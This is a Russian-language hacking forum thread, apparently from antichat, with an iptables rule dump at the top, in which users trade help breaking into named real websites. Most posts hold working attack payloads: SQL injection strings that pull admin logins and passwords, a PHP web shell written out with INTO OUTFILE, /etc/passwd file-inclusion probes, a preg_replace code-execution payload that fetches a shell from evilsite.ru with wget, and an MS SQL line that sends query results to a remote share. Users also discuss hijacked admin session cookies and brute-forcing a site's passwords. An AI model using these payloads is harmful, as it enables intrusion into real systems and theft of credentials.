LOG_FILTER all -- anywhere anywhere
LOG all -- anywhere anywhere LOG level info prefix `Unknown Input'

Chain FORWARD (policy DROP)
target prot opt source destination
ACCEPT icmp -- anywhere anywhere limit: avg 10/sec burst 5
TCPMSS tcp -- anywhere anywhere tcp flags:SYN,RST/SYN TCPMSS clamp to PMTU
OUTBOUND all -- anywhere anywhere
ACCEPT tcp -- anywhere 198.202.66.0/24 state RELATED,ESTABLISHED
ACCEPT udp -- anywhere 198.202.66.0/24 state RELATED,ESTABLISHED
LOG_FILTER all -- anywhere anywhere
LOG all -- anywhere anywhere LOG level info prefix `Unknown Forward'

Chain OUTPUT (policy DROP)
target prot opt source destination
ACCEPT tcp -- урл сайта урл сайта tcp dpt:domain
ACCEPT udp -- урл сайта урл сайта udp dpt:domain
ACCEPT tcp -- урл сайта урл сайта tcp dpt:domain
ACCEPT udp -- урл сайта урл сайта udp dpt:domain
ACCEPT all -- anywhere anywhere
DROP all -- base-address.mcast.net/8 anywhere
DROP all -- anywhere base-address.mcast.net/8
DROP all -- 255.255.255.255 anywhere
DROP all -- anywhere 0.0.0.0
DROP all -- anywhere anywhere state INVALID
OUTBOUND all -- anywhere anywhere
OUTBOUND all -- anywhere anywhere
LOG_FILTER all -- anywhere anywhere
LOG all -- anywhere anywhere LOG level info prefix `Unknown Output'

Chain INBOUND (4 references)
target prot opt source destination
ACCEPT tcp -- anywhere anywhere state RELATED,ESTABLISHED
ACCEPT udp -- anywhere anywhere state RELATED,ESTABLISHED
ACCEPT all -- 198.202.66.0/24 anywhere
ACCEPT all -- 198.202.69.0/24 anywhere
ACCEPT all -- 10.0.0.0/8 anywhere
ACCEPT tcp -- anywhere anywhere tcp dpt:smtp
ACCEPT udp -- anywhere anywhere udp dpt:smtp
ACCEPT tcp -- anywhere anywhere tcp dpt:http
ACCEPT udp -- anywhere anywhere udp dpt:http
LSI all -- anywhere anywhere

Chain LOG_FILTER (5 references)
target prot opt source destination

Chain LSI (2 references)
target prot opt source destination
LOG_FILTER all -- anywhere anywhere
LOG tcp -- anywhere anywhere tcp flags:FIN,SYN,RST,ACK/SYN limit: avg 1/sec burst 5 LOG level info prefix `Inbound '
DROP tcp -- anywhere anywhere tcp flags:FIN,SYN,RST,ACK/SYN
LOG tcp -- anywhere anywhere tcp flags:FIN,SYN,RST,ACK/RST limit: avg 1/sec burst 5 LOG level info prefix `Inbound '
DROP tcp -- anywhere anywhere tcp flags:FIN,SYN,RST,ACK/RST
LOG icmp -- anywhere anywhere icmp echo-request limit: avg 1/sec burst 5 LOG level info prefix `Inbound '
DROP icmp -- anywhere anywhere icmp echo-request
LOG all -- anywhere anywhere limit: avg 5/sec burst 5 LOG level info prefix `Inbound '
DROP all -- anywhere anywhere

Chain LSO (0 references)
target prot opt source destination
LOG_FILTER all -- anywhere anywhere
LOG all -- anywhere anywhere limit: avg 5/sec burst 5 LOG level info prefix `Outbound '
REJECT all -- anywhere anywhere reject-with icmp-port-unreachable

Chain OUTBOUND (3 references)
target prot opt source destination
ACCEPT icmp -- anywhere anywhere
ACCEPT tcp -- anywhere anywhere state RELATED,ESTABLISHED
ACCEPT udp -- anywhere anywhere state RELATED,ESTABLISHED
ACCEPT all -- anywhere anywhere

можно ли в mysql в подзапросе записать инфу в файл?

paypoker можно через into outfile при соответсвующих правах

paypoker можно через into outfile при соответсвующих правах

http://xxx/xxx?id=48535'/**/and%22x%22/**/regexp/**/concat(%22x{1,25%22,/**/if(substring((SELECT/**/file_priv/**/FROM/**/mysql.user%20WHERE/**/user/**/=/**/'root'),1,1)/**/=/**/'Y',/**/(select/**/1/**/union/**/select/**/2),/**/%226}%22))/**/and/**/1='1


Subquery returns more than 1 row. т.е. права есть

select product_list.id, product_manufacturers.manname, product_list.manpart, product_list.descr, product_list.upccode, product_list.platform, product_list.sku, product_list.subsku, product_prices.price_msrp, product_prices.price_level1, product_list.refurb, product_list.demo, product_prices.instock, product_list.dropship as dship, product_list.visible from product_list, product_manufacturers, product_prices, site_skus where product_prices.price_level1 > 0 AND product_list.id = '48535'/**/and"x"/**/regexp/**/concat("x{1,25",/**/if(MID((SELECT file_priv FROM mysql.user WHERE user = 'root'),1,1) = 'Y',/**/(select/**/1/**/union/**/select/**/2),/**/"6}")) and 1='1' and product_list.kit = '0' AND product_list.manid = product_manufacturers.manid and site_skus.pid = product_list.id and site_skus.divid = '0' and product_list.id = product_prices.id group by product_list.id

собственно как? обрубать запрос нельзя обрубалки не работают :)
нужно сделать через подзапрос

paypoker

проверяем файл прив
id=1+and+1=(if(load_file('/etc/passwd')+is+not+NULL,1,2))

заливаем
id=1+and+if((select+"<?php код ?>"+into+outfile+'/dir/shell.php'),1,2)=1

обрубалки и фильтры так-же как и в твоём подзапросе обойдёшь, если база старая добавь from

ну думаю если такую чудо конструкцию сумел составить, разберёшься и под себя переделаешь, это макет :)

вот якобы скуль
http://www.bicentenary.tas.gov.au/events/event.php?id=10'
вызывает ошибку
Database error: Invalid SQL: SELECT * FROM activity WHERE id=10\'
MySQL Error: 1064 (You have an error in your SQL syntax near '\'' at line 1)
Session halted.
вроде вот оно счастье
определяю количество столбов
http://www.bicentenary.tas.gov.au/events/event.php?id=10+order+by+20
работает
http://www.bicentenary.tas.gov.au/events/event.php?id=10+order+by+21
выдает ошибку. Столбцов у нас 20 значит.
Сотмрю
http://www.bicentenary.tas.gov.au/events/event.php?id=10+union+select+1,2,3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20
и получаю
504 ошибку,
Вы попытались получить доступ к адресу http://www.bicentenary.tas.gov.au/events/event.php?id=10+union+select+1,2,3,4,5,6,7,8,9,10, 11,12,13,14,15,16...
О_о, в чем прикол ?

http://www.bicentenary.tas.gov.au/events/event.php?id=10+and+substring(version(),1,1)=3

rtfm

не могу найти админку на http://www.beeliefbotanics.com, всю бошку сломал, помогите кто может, заранее пасиб

http://www.beeliefbotanics.com/admin.php админка, авторизация где-то в другом месте или через куки, GET

http://www.beeliefbotanics.com/admin.php админка, авторизация где-то в другом месте или через куки, GET

ну у меня реакция - пустая страница, тоже самое и при http://www.beeliefbotanics.com/admin1012121.php например...

Значит у меня такой вопрос по уязвимости через регулярку...
Вот для примера такой скриптик:

<?php
$get = $_GET['get'];
$get = preg_replace("#\[1\](.*?)\[/1\]#sie", "base64_encode(\\1)", $get);
echo $get;
?>

Регулярка preg_replace да ещё и с модификатором Е, в принципе на первый взгляд уязвимостей нету, ибо во второй параметр не передаётся переменных...
А вот если с этой стороны посмотреть, то я предполагаю, что можно составить регулярное выражение типа: );eval(phpcode
То есть смысл, закрываем функцию base64_encode и открываем функцию eval с нашим кодом.
Однако как бы я не пробовал, что то у меня не получается… Вот хотелось бы уточнить конкретно, данный код уязвим, или нет?

http://127.0.0.1/4/11.php?get=phpinfo()

выводит phpinfo()

Во нашел


http://127.0.0.1/4/11.php?get=eval($d)&d=echo%20'fff';

или так http://127.0.0.1/dir.php?get=system(dir) - у мну все выполняеться

Вероятно вы не поняли ситуацию, сам передаваемый текст в итоге оказывается в функции base64_encode(\\1), а не за её пределами, конечно же в base64_encode() никакого кода и не может выполниться.
У меня был смысл выйти за пределы функции и вписать другую функцию.
?get=phpinfo() это по логике не должно сработать, и конечно у меня не срабатывает.
В регулярке изначально нету никаких eval, там есть только base64_encode

или так http://127.0.0.1/dir.php?get=system(dir) - у мну все выполняеться


взял твой пример у меня

http://127.0.0.1/4/11.php?get=echo%20'fff'

Parse error: syntax error, unexpected T_ECHO, expecting ')' in C:\xampp\htdocs\4\11.php(3) : regexp code on line 1

Fatal error: preg_replace() [<a href='function.preg-replace'>function.preg-replace</a>]: Failed evaluating code: base64_encode(echo \'fff\') in C:\xampp\htdocs\4\11.php on line 3

а при моем на кавычки не ругается :)



Вероятно вы не поняли ситуацию, сам передаваемый текст в итоге оказывается в функции base64_encode(\\1), а не за её пределами, конечно же в base64_encode() никакого кода и не может выполниться.
У меня был смысл выйти за пределы функции и вписать другую функцию.
?get=phpinfo() это по логике не должно сработать, и конечно у меня не срабатывает.
В регулярке изначально нету никаких eval, там есть только base64_encode

а я ни чего против не имею, что в регулярке нету eval'a ,eval это уже как следствие выполнения php кода, а далее раз ты его выполняеш то и получаеш eval($d)&d=phpcode

О каком коде вы говорите?... Где исходники?
upd: Увидел, ща посмотрю...

Nightmarе, ты посмотри внимательно как ты парсишь текст:
preg_replace("#\(.*?)\[/1\]#sie", "base64_encode(\\1)", $get);
Если на входе http://127.0.0.1/1.php?get=[1]phpinfo()то на выходе будет base64_encode(phpinfo());
Сначала выполнится phpinfo(); - выведет результат на экран, а потом base64_encode(phpinfo()); выведет MQ==, т.е кодированный в base64 результат ВЫПОЛНЕНИЯ ф-ции phpinfo(), т.е. 1 (1 - ф-ция выполнилась успешно, 0 - нет) . Вся ошибка твоего кода в том, что ты не ставишь кавычек на заменяющую строку. Т.е. вместо "base64_encode(\\1)" поставь "base64_encode('\\1')"И твой код будет полностью защищен - выполнить какие-либо php-функции не удастся. Это по поводу безопасности..

Если же тебе надо, н.п. шелл залить, на вход отправь данные: ?get=system($_GET[0])&0=wget+http://evilsite.ru/evilcode.txt+-O+shell.php Он сработает. Почему? Интерпретатор будет интерпретировать строку base64_encode(system($_GET[0]))Сначала выполнится ф-ция system(), которая берет аргумент с GET параметра 0, а он у тебя wget http://evilsite.ru/evilcode.txt -O shell.php
Синтаксис wget объяснять не буду...

Спасибо теперь разобрался с тем кодом.
Теперь есть вот такой:
$line = preg_replace("#\[1\](.*?)\[/1\]#sie", "'<a href=\"javascript:getfile(\''.addslashes('\\1').'\');\"><font color=#E2C6EE>\\1</font></a>'", $line);
То есть тут \\1 выходит 2 раза, первый как и положенно в ковычках, а вот второй она не фильтруется ничем, однако выполнить php код так-же не получается, уязвим ли этот кусок кода?

Спасибо теперь разобрался с тем кодом.
Теперь есть вот такой:
$line = preg_replace("#\[1\](.*?)\[/1\]#sie", "'<a href=\"javascript:getfile(\''.addslashes('\\1').'\');\"><font color=#E2C6EE>\\1</font></a>'", $line);
То есть тут \\1 выходит 2 раза, первый как и положенно в ковычках, а вот второй она не фильтруется ничем, однако выполнить php код так-же не получается, уязвим ли этот кусок кода?Нет, тебя в кавычках строка на выходе.
$line = preg_replace("#\[1\](.*?)\[/1\]#sie", "'<a href=\"javascript:getfile(\''.addslashes('\\1').'\');\"><font color=#E2C6EE>\\1</font></a>'", $line);
Почему не работает? - Смотри выше.

include_once ('./lang/'.$lang_include);

возможно ли что-либо подинклюдить, кроме как с папки lang?

u36a, если RG - on, то ?lang_include=../../../(...)/etc/passwd

include_once ('./lang/'.$lang_include);

возможно ли что-либо подинклюдить, кроме как с папки lang?
Да, если нету фильтра на ../

// query strings
$query_string = '?in_wp='.$in_wp.'&amp;return_function='.$return_funct ion.'&amp;lang='.$lang_include.'&amp;folder='.$folderpath. '&amp;instance_img_dir='.$instance_img_dir.'&amp;sort_by=' .$sort_by.'&amp;sort_dir='.$sort_dir.'&amp;thumbnails='.$d oThumbs;
$query_inputs = '<input type="hidden" name="lang" value="'.$lang_include.'">
<input type="hidden" name="return_function" value="'.$return_function.'">
<input type="hidden" name="folder" value="'.$folderpath.'">
<input type="hidden" name="instance_img_dir" value="'.$instance_img_dir.'">
<input type="hidden" name="in_wp" value="'.$in_wp.'">
<input type="hidden" name="sort_by" value="'.$sort_by.'">
<input type="hidden" name="sort_dir" value="'.$sort_dir.'">
<input type="hidden" name="thumbnails" value="'.$doThumbs.'">';

я так понимаю, что фильтра нет, просто, если пишешь с ../ и указываешь любое имя файла, то уже нет ошибки о том, что файл не существует, это и насторожило..

http://www.cmeta.ru/new/mambots/editors/wysiwygpro/image.php?lang=

Незнаю как раскрутить _http://www.lovepage.it/dating-online/cronologia.asp?id=%27%27
Что поставить вместо id чтобы подбирать таблицы union+select+1 и тд

http://www.lovepage.it/dating-online/profilo_utente.asp?ID=rogerb'+and+if(ascii(substri ng((select+table_name+from+information_schema.tabl es+limit+0,1),1,1))>1,1,0)--+

А как таблицы узнать?И данные выводить.

https://forum.antichat.ru/threadnav43966-1-10.html

3.1 Посимвольный перебор

Узнал что есть таблица admin_login.Как поля выводить и потом concat(login) типо того сделать.
Извиняюсь за назойливость.

Узнал что есть таблица admin_login.Как поля выводить и потом concat(login) типо того сделать.
Извиняюсь за назойливость.

https://forum.antichat.ru/thread24918.html
https://forum.antichat.ru/thread119047.html

Узнал что есть таблица admin_login.Как поля выводить и потом concat(login) типо того сделать.
Извиняюсь за назойливость.
id=-1+union+select+1,2,3,4,5,6,7+from+admin_login+--+
Это к примеру как выглядит твой запрос поначалу.
id=-1+union+select+1,2,3,concat_ws(0x3a,login,password ),5,6,7+from+admin_login+--+
Конечно столбцы могут называться по другому, я тебе просто привёл пример.

А вобще юзай поиск, или же читай тему про SQL Инъекцию.

http://www.cmeta.ru/new/mambots/editors/wysiwygpro/image.php?lang=index.php так этот инклюд можно как-то раскрутить или не? Просто не понимаю есть фильтр или нет.

http://www.cmeta.ru/new/mambots/editors/wysiwygpro/image.php?lang=index.php так этот инклюд можно как-то раскрутить или не? Просто не понимаю есть фильтр или нет.
http://www.cmeta.ru/new/mambots/editors/wysiwygpro/image.php?lang=../../../../../../../(...)/etc/passwd
Скорее всего есть чем нету.

Это инклюд, но инклюд с фильтром.
В lang нельзя использовать
$values = array('/','\\','?','&','%','#','~',':',' ','<','>','*','+','@','"',"'",'|',"\r","\n","\t");

Это к примеру как выглядит твой запрос поначалу.

Конечно столбцы могут называться по другому, я тебе просто привёл пример.

А вобще юзай поиск, или же читай тему про SQL Инъекцию.
Была бы простая инъекция-непопросил бы помоши.Твое предложение к сожелению неподойдет :)
Узнал что есть таблица acces.
Когда делаю запрос _http://www.lovepage.it/dating-online/profilo_utente.asp?ID=rogerb%27+and+if(ascii(subst ring((select+column_name+from+acces),1,1))%3E=1,1, 0)--+
Ошибка.Пробовал перекодировать в хекс,все равно,но по ошибка и если попробовать _http://www.lovepage.it/dating-online/profilo_utente.asp?ID=rogerb%27+and+if(ascii(subst ring((select+column_name+from++CHARACTER_SETS),1,1 ))%3E=1,1,0)--+
Прошу сильно не пинать-с блиндом только учусь работать( и с POST инъекциями :o )

http://www.dneprohost.com.ua/dp.php?key=' вроде инъекция, но там запрос какойто необычный мб нужен, помогите

http://www.dneprohost.com.ua/dp.php?key=' вроде инъекция, но там запрос какойто необычный мб нужен, помогите


http://forum.antichat.ru/thread104591.html

Подчёркиваю: инъекция, это именно возможность влиять на запрос, возможность внедрить в него что-то, а не просто ошибка базы. (c)Jokester

пробуй проверить ее на логику, не получается выполнить логику значит не SQl-inj

http://www.cmeta.ru/new/mambots/editors/wysiwygpro/image.php?lang=../../../../../../../(...)/etc/passwd
Скорее всего есть чем нету.


Так как только с GET полявляется .. или / ошибки пропадают, откуда я знаю обход срабатывает или нет?

http://volkswagen.msk.ru/index.php?p=../../../../../../../../etc/passwd

Этот инклюд тоже глухой?

Этот инклюд тоже глухой?
Тут вообще его нет =\ похоже на ошибку в логике скрипта

http://www.dneprohost.com.ua/dp.php?key=' вроде инъекция, но там запрос какойто необычный мб нужен, помогите
Там экранирование просто.

Тут вообще его нет =\ похоже на ошибку в логике скрипта

Ясненько. В этом направлении и думал.

http://www.cmeta.ru/new/mambots/editors/wysiwygpro/image.php?lang=../../../../../../../(...)/etc/passwd

А вот в этом скрипте инклюд конечно более важен, у меня есть исходники этого скрипта, не нашёл в нём никаких проверок на фильтрацию.. (.. /)

Может какой мод стоить или какая настройка апатча\пхп? Просто есть два хоста с этой тулзой, на обоих одинаковый результат при подставлении ../../ Пробывал url endec, результат такой же.

Database query errorYou have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1 limit 0,50' at line 1

вылазит при &script=post+order+by+1

за SQL - inj можно считать? и если да, то как ее реализовать

PS при этом имею к примеру


при &script=post все норма,
а если стави &script=post1

пишет Database query errorUnknown column 'post1 in 'order clause'

order by $script limit 0,50:
&script=post+order+by+1
=>near 'order by 1 limit 0,50'
&script=post1
=>Unknown column 'post1 in 'order clause'
https://forum.antichat.ru/showpost.php?p=1494443&postcount=11
https://forum.antichat.ru/threadnav35207-1-10.html

Помогите плиз сформировать запрос по этому:
select id,DATE_FORMAT(date,'%d.%m.%Y') as date,toString,name,answer from _sa_prefix_database_guestbook where visible and published and exist and parent='172' order by position desc limit -40,10
А то, что-то не выходит сделать вывод печатного поля ((

такой вопрос, имею слепую, знаю колонки , какой составить запрос что бы искать посимвольно имя таблицу в которой есть колока к примеру pass??

:)

ЗЫ ElteRUS От тебя жду ответа =)

...(select table_name from information_schema.columns where column_name like 0x257061737325 limit 0,1)...

Есть инъекция в MS SQL
Но отключен вывод ошибок

Что можно сделать?
Може как-то как в MySQL с union select 1,2,3,4?

order by $script limit 0,50:

=>near 'order by 1 limit 0,50'

=>Unknown column 'post1 in 'order clause'
https://forum.antichat.ru/showpost.php?p=1494443&postcount=11
https://forum.antichat.ru/threadnav35207-1-10.html

Смотри пункт 3.4 на http://forum.xaknet.ru/thread4556.html
Лично мне такое еще не попадалось.

Есть инъекция в MS SQL
Но отключен вывод ошибок

Что можно сделать?
Може как-то как в MySQL с union select 1,2,3,4?

Что-то мне сегодня захотелось сделать что-нибудь полезное :)
Можно использовать sp_makewebtask, чтобы записать ваш запрос в HTML:

'; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"

Указываемый IP должен иметь папку "share" с доступом для Everyone.

Хотя помнится я как-то и с union select развлекался, правда в postgres sql но погоды это не делает, ибо что в постгрис что в мсскл нужно чтобы типы всех параметров совпадали, так что не компостируй себе мозГ, читай http://www.securitylab.ru/analytics/216211.php

здрасте всем... нашёл пасивку на одном ресурсе... суть такова, стоит самописный сайт и пхпбб. дело в том что юзеры на сайте и на форуме логинятся под одним ником, кукисы такие как у пхпбб. дело в том что смог угнать модера
куки у него вот такого вида

iua=1; b=b; phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologini d%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3 A-1%3B%7D; ; phpbb2mysql_sid=dc4b2038e838e83c1789c49dc4960b4d
Потом смог же заманить на пасивку и админа но у него в куках присутствует еше какое то поле

; phpbb2mysql_sid=6c5ea6d3269f4ba89585ecb7547090db; phpbb2mysql_t=a:2:{i:12062;i:1254481197;i:12078;i: 1254507094;}; phpbb2mysql_data=a:2:{s:11:"autologinid";s:0:"";s:6:"userid";i:-1;}; iua=1; b=b

Вот вопрос, как мне в опере или в другом браузере добавить такое поле? в опере на сколько я понял можно менять существующие поля, но новые создавать нельзя...
з.ы. пробовал переименововать поле b но ничего не получалось, после обновления страницы я становился неавторизованым

у Fire Fox есть такой плагин - cookie editor называется. Вот там и добавляется все спокойно

https://addons.mozilla.org/en-US/firefox/addon/573

Есть ли прога, которая из имеющегося текстового списка брала слова, вставляла бы их в окошко клиента (чат, к примеру) и нажимала/кликала Ввод ?

AutoHotKey
Xedant Human Emulator

ломаю сайт при пподстановки ковычки пишетselect * from `www_referer` where `from_referer`='' and `to_referer`='/consultation/index.php?consultation=2'' You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/consultation/index.php?consultation=2''' at line 3
какой еще рефер нужен перебрал столбцы до 30 все одно и тоже

ошибся темой - тебе сюда (http://forum.antichat.ru/threadnav46016-925-10.html)
кавычку в форму пихаешь?
+давай линк на ресурс.
ЗЫ пробуй ' OR 1=1#, если повезет -- получишь инфу из `www_referer`
не катиткак ты говоришь бейсик авторизация

чето я проблемы не вижу
' order by 1--
' order by 999--
не?

Если отключен вывод ошибок, то для проведение SQL inj только benchmark?

Бред какой-то. Есть еще ряд показателей, уникальных в каждом случае, которые просто надо уметь видеть. Если есть иньекция, и она блайнд - это не значит, что тот, кто её делает, должен быть слеп

- перенаправление на другую старницу
- изменение содержимого страницы
- ........
...........
и etc.

не надо делать из меня дурака:


только benchmark?

появился шелл,на вин 2003/ISS 6.0,редактировать файлы прав нету,на созданные файлы шеллом даже права 777 не ставит,что это может быть? зиливал скрипитом через пхпадмин,это первый раз такое..

появился шелл,на вин 2003/ISS 6.0,редактировать файлы прав нету,на созданные файлы шеллом даже права 777 не ставит,что это может быть? зиливал скрипитом через пхпадмин,это первый раз такое..


на венде нет чмодов, поэтому и не ставит. А файлы редактировать не можешь, потмоу что прав нет. В настройках IIS можно так настраивать.

на венде нет чмодов, поэтому и не ставит. А файлы редактировать не можешь, потмоу что прав нет. В настройках IIS можно так настраивать.
уже лучше,а где если не сикрет включить/отключить?

уже лучше,а где если не сикрет включить/отключить?
В настройках учётных записей, хотя боюсь в винде это будет сделать не просто...

уже лучше,а где если не сикрет включить/отключить?


Наверное в конфигах IIS - но прав у тебя нет наверняка для этого.

ЗЫ. в какой доменной зоне сайт?)

Shadrin, существуют простые аплодеры которые работают средствами mysql, через into outfile

введи у себя на винде в цмд и почитай:
attrib /?
Может и прокатит на твоем шелле,хотя и маловероятно.

хелп плиз.
есть доступ к админке, можно заливать файлы на сервер, залил php shell, но на сервере Safe-mode ON. даже листинг файлов сделать нельзя.
Скажите что нужно прописать в .htaccess, чтобы в папке(не cgi-bin) исполнялись perl скрипты?

чти
http://www.besthostratings.com/articles/enable-cgi-php-ssi-htaccess.html

ребят всем доброго времени суток
подскажите пожалуйста я установил xampp запустил цмд прописал путь :
c:\xampp\php\php.exe
далее начал прописывать путь к сплойту и нечего не происходит
даже если написать после хампа всякую чушь вроде dsdhsds тоже не реагирует
просьба за символичискую плату помоч =)) если ошибся разделом извиняйте

создай .bat файл в нем пропиши


CD\
cmd /k xampp\php\php.exe C:\sploitipb\1.php .. .. ...

..- какие функции у тебя там для сплоита

..- какие функции у тебя там для сплоитаНе функции, а аргументы )

Всем привет.Нашёл инжект в Microsoft JET Dabatase.Узнал пару тройку имён таблиц.Количество полей подобрал.После подстановки реальной таблицы выдаётся ошибка:

Syntax error in FROM clause.

Как это объяснить и как выдрать информацию ?

Запрос вышел что-то вроде parameter+union+select+1,2,3+FROM+realtable

Всем привет)Помогите подобрать имя таблицы, много вариантов перепробовал, но все без успешны...
http://gazanalyzator.ru/?id=70+union+select+1,2/*
Заранее спасибо)

Всем привет)Помогите подобрать имя таблицы, много вариантов перепробовал, но все без успешны...
http://gazanalyzator.ru/?id=70+union+select+1,2/*
Заранее спасибо)
_ttp://gazanalyzator.ru/?id=-70+union+select+version()+from+news/* :)

Всем привет)Помогите подобрать имя таблицы, много вариантов перепробовал, но все без успешны...
http://gazanalyzator.ru/?id=70+union+select+1,2/*
Заранее спасибо)


=============================
gazanalyzator.ru
89.104.81.227
=============================
4.1.22-standard
-------
-------
Найденные таблицы:
-------
itaf_user
news
vote_results
-------
=============================
Найденные колонки из таблицы itaf_user:
-------
id
user_name
user_pass
user_mail
=============================


http://gazanalyzator.ru/?id=70+union+select+1,concat_ws(0x3a,user_name,use r_pass)+from+itaf_user/*

Привет всем. думаю все знают прагу brutus-aet2. В инете милион статей как с помощью этой праги угнать мыло и фтп, а вот как этой прагой подобрать пасс зная логин к сайту(тоесть к форме) немогу понять. вроде как то получилось так прага вылает левые пароли. кому не трудно обьесните пожалуйста. пытался подобрать пасс к сайту http://www.voyna-plemyon.ru/

Привет всем. думаю все знают прагу brutus-aet2. В инете милион статей как с помощью этой праги угнать мыло и фтп, а вот как этой прагой подобрать пасс зная логин к сайту(тоесть к форме) немогу понять. вроде как то получилось так прага вылает левые пароли. кому не трудно обьесните пожалуйста. пытался подобрать пасс к сайту http://www.voyna-plemyon.ru/
http://forum.antichat.ru/thread109600.html
Эту попробуй

http://forum.antichat.ru/thread109600.html
Эту попробуй
Возможностей много но прага сырая. :mad:
Обьясни как брудить форму прагой brutus-aet2. :confused:

Прога не сырая а универсальная, как раз формы норм брутит....

http://help.inbox.lv/?language=-1+union+select+1,2,3/*
Скажите, тут реально вывести версию базы даных?
Если да, то пример плз.

http://help.inbox.lv/?language=-1+union+select+1,2,3/*
Скажите, тут реально вывести версию базы даных?
Если да, то пример плз.
И так
Твой запрос приводит к ошибке.
Error pulling cat information from database: (SELECT cat_na as cat, maincat FROM cfaq_cats WHERE catid = 24) Unknown column 'cat_na' in 'field list'
Т.е. intval() нету, что неплохо.
Зато просто ограничение в 2 символа :)
Если хочешь, крути скулю в лимит 2 символа ;)

Первое, что приходит в голову: можно через reverse ip узнать на сервере другие сайты, а по этим путям попробовать через другой сайт пролезть.

И так
Твой запрос приводит к ошибке.
Error pulling cat information from database: (SELECT cat_na as cat, maincat FROM cfaq_cats WHERE catid = 24) Unknown column 'cat_na' in 'field list'
Т.е. intval() нету, что неплохо.
Зато просто ограничение в 2 символа :)
Если хочешь, крути скулю в лимит 2 символа ;)
Это не скуля!!! Могу пояснить почему для особо талантливых...

Это не скуля!!! Могу пояснить почему для особо талантливых...
Наркоман?
Возьмём ошибку.
Error pulling cat information from database: (SELECT cat_na as cat, maincat FROM cfaq_cats WHERE catid = 24) Unknown column 'cat_na' in 'field list'

Я в GET подставил na, получилось cat_na, т.е. такой колонки нету в базе данных.
А что тогда это?
XSS? :D

Наркоман?
Возьмём ошибку.
Error pulling cat information from database: (SELECT cat_na as cat, maincat FROM cfaq_cats WHERE catid = 24) Unknown column 'cat_na' in 'field list'

Я в GET подставил na, получилось cat_na, т.е. такой колонки нету в базе данных.
А что тогда это?
XSS? :D
это скуля ,но там стоит ограничение на длину параметра $_GET['language'] ,и если его значение > 2x ,символов => оно обрезается.
Примерно таким образом:
$a=substr($_GET['language'],0,2);

это скуля ,но там стоит ограничение на длину параметра $_GET['language'] ,и если его значение > 2x ,символов => оно обрезается.
Примерно таким образом:
$a=substr($_GET['language'],0,2);
Я это указал в своём посте.
Человек спросил про скулю?
Я ему ответил, что это "как бэ" скуля, но с ограничением в 2 символа.
А DrAssault говорит что это не скуля.

Я это указал в своём посте.
Человек спросил про скулю?
Я ему ответил, что это "как бэ" скуля, но с ограничением в 2 символа.
А DrAssault говорит что это не скуля.

Что не понятно это НЕ скуля! Что есть скуля?! Это, как минимум возможность повлиять на запрос в своих целях, то есть извлечение данных и т.д. Что мы имеем тут?! Для этого надо разобраться, почему же возникает ошибка... а возникает она именно потому, что значение переданное через гет параметру language не соответствует колоночкам в БД из которых идет выборка, то есть к примеру выборка из колонки cat_ru даёт один резалт (страницу на русском языке), а cat_en другой результат, что логично, так как выборка возможна, такие поля существуют, а ошибка происходит именно потому, что в качестве значения вы подсовываете параметру лажовое значение... А вот теперь вопрос! Внимание... есть ли у нас возможность повлиять на ход запроса?!

ЗЫ Ctacok, умничать в болталку со своими гениальными шутками!!! Начинаешь действовать на нерву...

Что не понятно это НЕ скуля! Что есть скуля?! Это, как минимум возможность повлиять на запрос в своих целях, то есть извлечение данных и т.д. Что мы имеем тут?! Для этого надо разобраться, почему же возникает ошибка... а возникает она именно потому, что значение переданное через гет параметру language не соответствует колоночкам в БД из которых идет выборка, то есть к примеру выборка из колонки cat_ru даёт один резалт (страницу на русском языке), а cat_en другой результат, что логично, так как выборка возможна, такие поля существуют, а ошибка происходит именно потому, что в качестве значения вы подсовываете параметру лажовое значение... А вот теперь вопрос! Внимание... есть ли у нас возможность повлиять на ход запроса?!

ЗЫ Ctacok, умничать в болталку со своими гениальными шутками!!! Начинаешь действовать на нерву...
Головой подумай ога, я тебя не оскорблял.

Во вторых он спросил насчёт скули, я ему ответил, и ты тут валазиешь из тумана.

Головой подумай ога, я тебя не оскорблял.
Сэнкью вэри мач, я так рад, так рад, что ты меня ещё и не оскорбил :mad:


Во вторых он спросил насчёт скули, я ему ответил, и ты тут валазиешь из тумана.
Ну, во-первых, не из тумана, это форум и тут имеют право отписываться абсолютно все, а во-вторых, я ответил по сабжу, ты с чем то не согласен?

Сэнкью вэри мач, я так рад, так рад, что ты меня ещё и не оскорбил :mad:


Ну, во-первых, не из тумана, это форум и тут имеют право отписываться абсолютно все, а во-вторых, я ответил по сабжу, ты с чем то не согласен?
Так, ты сказал что "скуля" это влияние на SQL запрос?
Здесь есть влияние на SQL запрос, т.е.
Error pulling cat information from database: (SELECT cat_na as cat, maincat FROM cfaq_cats WHERE catid = 24) Unknown column 'cat_na' in 'field list'
Данное значение берётся из GET запроса language.
Я влияю на SQL запрос, просто меня ограничивает скрипт до 2-х знаков.
Что ещё доказать надо?
Можно уже и не враждовать, кроме - в репу мы нечего здесь неполучим.

Да. думаю пора заканчивать.

Это спор о терминологии. и случай скорее выпадает из классификации, так что истина где-то рядом :

С одной стороны мы можем внедрить в запрос 2 символа, тоесть инъекция на лицо, а с другой стороны, влиять на запрос мы не можем. Тоесть если мы не можем передать базе верное наше выражение, а можем только вызвать ошибку наверное об иньекции речи быть не может

Вобщем не сходите с ума, правы оба по своему. А флейм прекращайте.

=====================

Там кстати ещё и двойной запрос , но это дела не меняет, хотя если есть такие косяки, может быть и нормальная скуль найдётся, я не особо смотрел

http://help.inbox.lv/index.php?catid=111111&language=23
(SELECT cat_23 as cat, maincat FROM cfaq_cats WHERE catid = 111111)

http://help.inbox.lv/index.php?catid=%00&language=3434
(SELECT catid, cat_34 as cat, description_34 as description FROM cfaq_cats WHERE maincat = 0 ORDER BY prio ASC)